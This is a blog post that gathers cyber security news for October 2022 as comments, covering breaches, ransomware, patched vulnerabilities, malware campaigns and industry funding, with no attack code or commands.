Cyber security news October 2022

This posting is here to collect cyber security news in October 2022.

I post links to security vulnerability news to comments of this article.

You are also free to post related links to comments.


  1. Tomi Engdahl says:

    Hive Ransomware Hackers Begin Leaking Data Stolen from Tata Power Energy Company
    The Hive ransomware-as-a-service (RaaS) group has claimed responsibility for a cyber attack against Tata Power that was disclosed by the company less than two weeks ago. The Mumbai-based firm, which is India’s largest integrated power company, is part of the Tata Group conglomerate.

  2. Tomi Engdahl says:

    Google Chrome to drop support for Windows 7 / 8.1 in Feb 2023
    Google announced today that the Google Chrome web browser will likely drop support for Windows 7 and 8.1 starting February 2023.

  3. Tomi Engdahl says:

    Internet is shut down in Sudan on anniversary of military coup
    Online access in Sudan was disrupted Tuesday as tens of thousands protested on the anniversary of a military coup that derailed a transition towards democratic governance.

  4. Tomi Engdahl says:

    FTC Targets Drizly and Its CEO Over Cybersecurity Failures That Led to Data Breach

    The Federal Trade Commission (FTC) this week announced an administrative complaint against online alcohol marketplace Drizly and its CEO, James Cory Rellas, over the company’s poor data security practices.

    The FTC acted on the company’s security failures that led to a data breach impacting the personal information of over 2.5 million individuals, and which occurred even though Drizly and Rellas were informed of existing security issues two years prior.

    Because the company failed to implement strong protections for customer data, the FTC is now requiring Drizzly to destroy unnecessary data and to collect less information from its customers, and binds Rellas to specific data security requirements.

    “Our proposed order against Drizly not only restricts what the company can retain and collect going forward but also ensures the CEO faces consequences for the company’s carelessness. CEOs who take shortcuts on security should take note,” FTC director Samuel Levine said.

  5. Tomi Engdahl says:

    US Charges Ukrainian ‘Raccoon Infostealer’ With Cybercrimes

    Home › Tracking & Law Enforcement
    US Charges Ukrainian ‘Raccoon Infostealer’ With Cybercrimes
    By AFP on October 25, 2022

    A Ukrainian man has been charged with computer fraud for allegedly infecting millions of computers with malware in a cybercrime operation known as “Raccoon Infostealer,” the US Justice Department said Tuesday.

  6. Tomi Engdahl says:

    Arnica Raises $7 Million to Protect Software Developers, Code

    Behavior-based threat detection startup Arnica has raised $7 million in a seed funding round led by Joule Ventures and First Rays Venture Partners, with participation from several angel investors.

    Founded in August 2021, the Atlanta-based startup aims to secure the software supply chain by monitoring developers’ behavior to validate the authenticity of changes made to the code and identify attackers impersonating developers.

    Arnica relies on machine learning and graph-based behavioral analysis to help organizations tackle anomalies and risks in their development ecosystem, to keep both code and developers protected.

  7. Tomi Engdahl says:

    Apple Fixes Exploited Zero-Day With iOS 16.1 Patch

    Apple on Monday shipped a major iOS update with fixes for at least 20 documented security defects, including a kernel flaw that’s already being actively exploited in the wild.

    The Cupertino device maker confirmed the active exploitation of CVE-2022-42827, warning in a barebones advisory that the flaw exposes iPhones and iPads to arbitrary code execution attacks.

    “An application may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited,” Apple said in a note documenting the security vulnerabilities.

    About the security content of iOS 16.1 and iPadOS 16
    This document describes the security content of iOS 16.1 and iPadOS 16.

  8. Tomi Engdahl says:

    Perygee Scores Seed Funding to Tackle IoT Security

    Perygee, an early-stage startup with ambitious plans in the enterprise IoT security space, has banked $4.75 million in new seed financing as investors continue to make bets on technology to secure devices outside the traditional corporate network.

    The company, which maintains corporate headquarters in Boston, said the latest funding was led by Ballistic Ventures and included investments from a roster of prominent cybersecurity executives.

    To date, Perygee has raised $6.35 million in funding.

  9. Tomi Engdahl says:

    Medibank Confirms Broader Cyberattack Impact After Hackers Threaten to Target Celebs

    Australian private insurer Medibank on Tuesday confirmed that a recently disclosed cyberattack impacts the data of more customers than initially thought. The announcement came days after hackers threatened to target celebrities.

    Identified on October 12, the cyberattack was deemed as the precursor of a ransomware event, but was contained before ransomware could be deployed, Medibank has announced.

    Roughly one week later, the company announced that it had been contacted by a threat actor claiming to have stolen roughly 200 gigabytes of data during the cyberattack.

  10. Tomi Engdahl says:

    Kimsuky Hackers Spotted Using 3 New Android Malware to Target South Koreans
    The North Korean espionage-focused actor known as Kimsuky has been observed using three different Android malware strains to target users located in its southern counterpart. That’s according to findings from South Korean cybersecurity company S2W, which named the malware families FastFire, FastViewer, and FastSpy.

  11. Tomi Engdahl says:

    Hackers Actively Exploiting Cisco AnyConnect and GIGABYTE Drivers Vulnerabilities
    Cisco has warned of active exploitation attempts targeting a pair of two-year-old security flaws in the Cisco AnyConnect Secure Mobility Client for Windows.

  12. Tomi Engdahl says:

    GitHub resolves flaw allowing attacker to take over repository, infect all applications
    GitHub has addressed a vulnerability allowing attackers to take control of one of its repositories and potentially infect all applications and other code relying on it.

  13. Tomi Engdahl says:

    Medibank says hackers had access to all personal data’ belonging to all customers
    Medibank, the Australian health insurance company which initially claimed to have foiled a ransomware attack saying that it had found “no evidence customer data has been removed from our network” has now confirmed that criminals had access to all of the personal data of all of its customers.

  14. Tomi Engdahl says:

    Finnairin asiakkaiden tietoja on vuotanut ulkopuolisille osana tieto­vuotoa
    TAP Air Portugal joutui elokuussa kiristyshaittaohjelmalla tehdyn hyökkäyksen kohteeksi. Finnairin asiakastietoja oli mukana yhtiöiden reittiyhteistyön vuoksi. (mahdollinen maksumuuri)

  15. Tomi Engdahl says:

    A Pro-China Disinfo Campaign Is Targeting US ElectionsBadly
    The suspected Chinese influence operation had limited success. But it signals a growing threat from a new disinformation adversary.

  16. Tomi Engdahl says:

    Online ticketing company “See” pwned for 2.5 years by attackers
    See Tickets is a major global player in the online event ticketing
    business: they’ll sell you tickets to festivals, theatre shows, concerts, clubs, gigs and much more. The company has just admitted to a major data breach that shares at least one characteristic with the amplifiers favoured by notorious rock performers Spinal Tap: “the numbers all go to 11, right across the board.”

  17. Tomi Engdahl says:

    Trends in Web Threats in CY Q2 2022: Malicious JavaScript Downloaders Are Evolving
    Palo Alto Networks Advanced URL Filtering subscription collects data regarding two types of URLs; landing URLs and host URLs. We define a malicious landing URL as one that allows a user to click a malicious link. A malicious host URL is a page containing a malicious code snippet that could abuse someone’s computing power, steal sensitive information or perform other types of attacks.

  18. Tomi Engdahl says:

    Microsoft fixes Windows vulnerable driver blocklist sync issue
    Microsoft says it addressed an issue preventing the Windows kernel vulnerable driver blocklist from being synced to systems running older Windows versions.

  19. Tomi Engdahl says:

    Jira Align flaws enabled malicious users to gain super admin privileges and potentially worse
    A pair of vulnerabilities patched in Jira Align could in the “worst-case scenario” be combined by low-privileged malicious users to target Atlassian’s cloud infrastructure, a security researcher warns.

  20. Tomi Engdahl says:

    VMware Patches Critical Vulnerability in End-of-Life Product
    VMware this week announced patches for a critical remote code execution vulnerability in VMware Cloud Foundation and NSX Data Center for vSphere (NSX-V).
    Tracked as CVE-2021-39144 (CVSS score of 9.8), the security defect exists in XStream, an open source library to serialize objects to XML and back.
    The bug impacts all XStream iterations until and including version 1.4.17. Only out-of-the-box versions are affected, but not those where XStream’s security framework was set up with a whitelist limited to the minimal required types.
    “Due to an unauthenticated endpoint that leverages XStream for input serialization in VMware Cloud Foundation (NSX-V), a malicious actor can get remote code execution in the context of ‘root’ on the appliance,” VMware notes in its advisory.
    NSX-V 6.4.x reached end of general support in January 2022. VMware says that it typically does not mention end-of-life (EOL) products in its advisories, but in this case it has decided to release the patch due to the vulnerability’s critical severity.
    VMware says that all NSX-V versions prior to 6.4.14 and VMware Cloud Foundation (VCF) 3.x releases are impacted. The vulnerability has been addressed with the release of NSX-v 6.4.14 and VCF
    VMware’s advisory also describes a medium-severity XML External Entity (XXE) vulnerability in VCF (CVE-2022-31678) that could be exploited by unauthenticated attackers to cause a denial-of-service (DoS) condition or to leak information

  21. Tomi Engdahl says:

    Data Breach at Australian Health Insurer Impacts 4 Million Customers; Could Cost $35M

    Australian health insurer Medibank on Wednesday confirmed that the personal and health information of all customers has been compromised in a recent data breach.

    Identified on October 12 and consistent with the precursor of a ransomware attack – albeit no ransomware has been deployed on Medibank’s systems – the incident has resulted in a threat actor exfiltrating roughly 200 gigabytes of data.

    Last week, the hackers contacted Medibank to boast about the data theft, threatening to target the company’s 1,000 most famous customers unless a ransom was paid.

    Medibank launched an investigation into the incident immediately after identifying it, but has not provided specific details on the number of impacted customers until now.

    Today, however, the health insurer confirmed that all its 3.9 million customers have been impacted by the data breach.

  22. Tomi Engdahl says:

    Data Breach Victims Sue Rhode Island Transit Agency, Insurer

    Two people whose personal information was compromised in a data breach at Rhode Island’s public bus service that affected about 22,000 people sued the agency and a health insurer on Tuesday seeking monetary damages and answers.

    The class-action suit filed in Providence Superior Court by cooperating attorneys for the American Civil Liberties Union of Rhode Island names the Rhode Island Public Transit Authority and United Healthcare as defendants.

    The personal information of roughly 5,000 RIPTA employees and retirees and thousands of other current, former and retired state workers, including Social Security numbers and Medicare identification numbers, was hacked in August 2021 through unauthorized access to RIPTA’s computer system.

    “When an individual’s confidential personal and health care information is compromised, that individual will have to worry about the potential for identity theft which could lead to financial ruin by impacting their savings, livelihood, credit score, and access to health care,” ACLU attorney Peter Wasylyk said. “It can cause significant stress for the rest of that individual’s lifetime.”

  23. Tomi Engdahl says:

    Nato-hakemus näkyy nyt Suomeen suuntautuvissa kyberhyökkäyksissä

    Venäjän ja Ukrainan sota vaikuttaa nyt suuresti myös kybermaailman puolella. Check Point Softwaren mukaan globaalit hyökkäykset lisääntyivät 28 prosenttia tämän vuoden kolmannella neljänneksellä. Suomi saa nyt iskuista kasvavan osan, mitä selittänee tekemämme Nato-hakemus.

    Suomessa yrityksiin kohdistui heinä-syyskuussa keskimäärin 1324 kyberhyökkäystä viikoittain. Määrä on 93 prosenttia suurempi kuin vuotta aikaisemmin eli kyberiskujen määrä on lähes kaksinkertaistunut. Pitää korostaa, ettei Check Point esitä mitään arviota Suomen iskujen määrän kasvun syistä, mutta eipä sylttytehtaan keksiminen tällä hetkellä mitään rakettitiedettäkään ole.

    Check pointin mukaan Venäjän hyökkäyssota ei selitä kaikkea kyberiskujen määrän kasvusta. Yhtiön mukaan näyttää siltä, että hakkerit ja hyökkäysryhmät ovat saaneet vauhtia ja luottamusta hyökätä loputtomalta näyttävään määrään kohteita ympäri maailmaa.

  24. Tomi Engdahl says:

    HyperSQL DataBase flaw leaves library vulnerable to RCE

    Mishandling of untrusted input issue resolved by developers

    Security researchers have discovered a serious vulnerability in HyperSQL DataBase (HSQLDB) that poses a remote code execution (RCE) risk.

    HSQLDB offers a Java-based SQL relational database system. The technology – which is the second most popular embedded SQL database with 100 million downloads to date – is used for development, testing, and deployment of database applications.

    HSQLDB is used by more than 3,120 Maven packages including LibreOffice, JBoss, Log4j, Hibernate, and Spring-Boot as well as various enterprise software packages.

  25. Tomi Engdahl says:

    Windows Event Log Vulnerabilities Could Be Exploited to Blind Security Products

    Remote attackers could exploit two Event Log vulnerabilities in Windows to crash the Event Log application and cause a denial-of-service (DoS) condition, Varonis warns.

    Event Log is an Internet Explorer-specific application that exists in all Windows iterations, due to the deep integration of the browser with the operating system.

    Due to the specific set of permissions that Event Log has, two security defects haunt all Windows iterations up to Windows 10, even with Microsoft ending support for Internet Explorer in June 2022.

    Called LogCrusher, the first of the exploits could allow a domain user to crash the Event Log on any Windows machine on the domain, remotely.

    The second exploit, called OverLog and tracked as CVE-2022-37981, allows a remote attacker to fill the hard drive of a Windows machine with log data, causing a denial-of-service (DoS) condition.

    The two exploits abuse the Microsoft Event Log Remoting Protocol (MS-EVEN), which exposes remote procedure call (RPC) methods to remote access. Specifically, they abuse OpenEventLog, a function that allows privileged users to read, write, and clear event logs on remote machines.

  26. Tomi Engdahl says:

    The Logging Dead: Two Event Log Vulnerabilities Haunting Windows
    You don’t have to use Internet Explorer for its legacy to have left you vulnerable to LogCrusher and OverLog, a pair of Windows vulnerabilities discovered by the Varonis Threat Labs team.
    Microsoft ended support for Internet Explorer on June 15, 2022. However, IE’s deep integration into the Windows ecosystem impacts the security and stability of current Windows operating systems.
    One feature of the IE and Windows integration is an Internet Explorer-specific Event Log that is present on all current Windows operating systems. This IE-specific Event Log has a distinct set of permissions that enable two exploits against Windows systems:
    LogCrusher, which allowed any domain user to remotely crash the Event Log application of any Windows machine on the domain.
    OverLog, which causes a remote denial-of-service (DoS) attack by filling the hard drive space of any Windows machine on the domain. (CVE-2022-37981)
    Microsoft, which released a partial patch on October 11, 2022. We urge everyone to patch their systems.

    Windows Event Logging Service Denial of Service Vulnerability
    According to the CVSS metric, availability is low (A:L). How could an attacker impact the availability?
    The performance can be interrupted and/or reduced, but the attacker cannot fully deny service.

  27. Tomi Engdahl says:

    See Tickets Customer Payment Card Data Stolen by Web Skimmer

    Ticketing services agency See Tickets is informing users that their payment card data was likely exposed after hackers injected skimmer code on its website.

    Owned by Vivendi SA, See Tickets provides ticketing services for comedy, festival, lifestyle, music, sport, and other types of events and operates several websites targeting both international and regional audiences in North America and Europe.

    The skimmer attack was initially identified in April 2021 and was fully shut down in January 2022, the company notes in a data breach notification letter sent to potentially impacted users, a copy of which was submitted to the Montana Attorney General’s office.

    Skimmer attacks rely on the injection of malicious JavaScript code into ecommerce websites, typically on checkout pages, to steal the information that the website’s users provide.

  28. Tomi Engdahl says:

    GitHub Account Renaming Could Have Led to Supply Chain Attacks

    Checkmarx warns that attackers could have exploited the renaming of popular GitHub accounts to create malicious repositories using the vacated name and launch software supply chain attacks.

    The technique, dubbed RepoJacking, involves the hijacking of a renamed repository’s traffic by breaking GitHub’s redirection mechanism, and routing the traffic to a malicious repository controlled by the attacker.

    Each GitHub repository has a unique URL under the user account that created it and, whenever the repository is cloned, the full repository URL is used.

    When a user changes their GitHub account username, the URL is changed by replacing the old username with the new one, and the code-hosting platform automatically redirects users to the new URL (for example, becomes

    An attacker aware of the change could have hijacked the old URL traffic by creating a GitHub account using the old username, and then creating a repository matching the old repository’s name, thus gaining control over the URL and breaking the default redirect.

    Attacking the Software Supply Chain with a Simple Rename

    Checkmarx SCS (Supply Chain Security) team found a vulnerability in GitHub that can allow an attacker to take control over a GitHub repository, and potentially infect all applications and other code relying on it with malicious code.

    If not explicitly tended, all renamed usernames on GitHub were vulnerable to this flaw, including over 10,000 packages on the Go, Swift, and Packagist package managers. This means that thousands of packages could have been hijacked immediately and start serving malicious code to millions of users.

    The vulnerability was fixed by GitHub following our report and is no longer exploitable.

  29. Tomi Engdahl says:

    New York Post ‘Hacked’ in Tweets Calling for Assassination of Biden, Lawmakers

    The New York Post said Thursday it had been “hacked” by an employee after the tabloid newspaper’s Twitter account posted a series of antagonistic messages, including a call for the assassination of US President Joe Biden.

    The rogue tweets were removed late Thursday morning.

    “The New York Post has been hacked. We are currently investigating the cause,” a message on the tabloid’s account said.

    “The New York Post’s investigation indicates that the unauthorized conduct was committed by an employee,” the Post said in a statement to AFP, adding that the worker in question had been fired.

    The tweets, published Thursday morning, included a call for the assassination of Biden, along with a demand to kill New York lawmaker Alexandria Ocasio-Cortez.

    The messages were formatted to look like normal tweets usually posted by the newspaper, which is owned by NewsCorp, the media empire owned by Australian billionaire Rupert Murdoch.

  30. Tomi Engdahl says:

    Jalkapallon MM-kisat käynnistyvät jos menet paikan päälle, tilaat itsellesi kasan ikävyyksiä
    Qatarin valtio pakottaa kaikki, myös vierailijat, asentamaan älypuhelimiinsa Qatarin kehittämän Ehteraz-koronaseurantasovelluksen.
    Norjalaisen NRK:n mukaan Ehteraz on käytännössä valtion rahoittama vakoiluohjelmisto.

  31. Tomi Engdahl says:

    Point-of-sale malware used to steal 167, 000 credit cards
    In the 19 months between February 2021 and September 2022, two point-of-sale (POS) malware operators have stolen more than 167, 000 payment records, mainly from the US, according to researchers at Group-IB. The researchers were able to retrieve information about infected machines and compromised credit cards by analyzing a command and control (C2) server used by the malware.

  32. Tomi Engdahl says:

    Raspberry Robin worm part of larger ecosystem facilitating pre-ransomware activity
    Microsoft has discovered recent activity indicating that the Raspberry Robin worm is part of a complex and interconnected malware ecosystem, with links to other malware families and alternate infection methods beyond its original USB drive spread. These infections lead to follow-on hands-on-keyboard attacks and human-operated ransomware activity. Our continuous tracking of Raspberry Robin-related activity also shows a very active operation: Microsoft Defender for Endpoint data indicates that nearly 3, 000 devices in almost 1, 000 organizations have seen at least one Raspberry Robin payload-related alert in the last 30 days.

  33. Tomi Engdahl says:

    Drinik Android malware now targets users of 18 Indian banks
    A new version of the Drinik Android trojan targets 18 Indian banks, masquerading as the country’s official tax management app to steal victims’ personal information and banking credentials. Drinik has been circulating in India since 2016, operating as an SMS stealer, but in September 2021, it added banking trojan features that target 27 financial institutes by directing victims to phishing pages.

  34. Tomi Engdahl says:

    New York Post hacked with offensive headlines targeting politicians
    New York Post confirmed today that it was hacked after its website and Twitter account were used by the attackers to publish offensive headlines and tweets targeting U.S. politicians.

  35. Tomi Engdahl says:

    New York Post was hacked from the inside, employee fired after offensive articles posted online
    It transpires that the newspaper had not fallen victim to external hackers as had first been suspected, but instead a rogue employee who had access to the website’s content management system (CMS) was responsible.


Leave a Comment

Your email address will not be published. Required fields are marked *